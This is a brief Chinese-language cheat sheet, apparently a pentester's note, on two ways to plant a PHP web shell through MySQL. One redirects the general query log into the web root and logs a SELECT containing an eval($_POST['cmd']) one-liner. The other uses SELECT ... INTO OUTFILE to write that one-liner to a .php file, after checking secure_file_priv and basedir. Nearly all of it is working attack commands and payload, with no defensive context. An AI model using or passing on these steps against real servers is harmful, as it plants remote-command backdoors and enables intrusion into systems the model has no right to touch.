法一:日志写马
- general log 指的是日志保存状态,ON代表开启 OFF代表关闭;
general log file 指的是日志的保存路径。- show variables like '%general%';#查看日志状态-->即可爆出日志的保存状态和保存路径
- SET GLOBAL general_log='on'
- SET GLOBAL general_log_file='根目录'#即设置日志保存的根目录的地址-->即典型你要写马的位置
- SELECT '<?php eval($_POST["cmd"]);?>'#执行语句-->即在日志文件中会直接生成
法二:
show variables like '%secure_file%'; 查看是否有任意位置读写文件权限
①查select @@basedir;
②利用into outfile进行写
select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/cc.php';#网站的根目录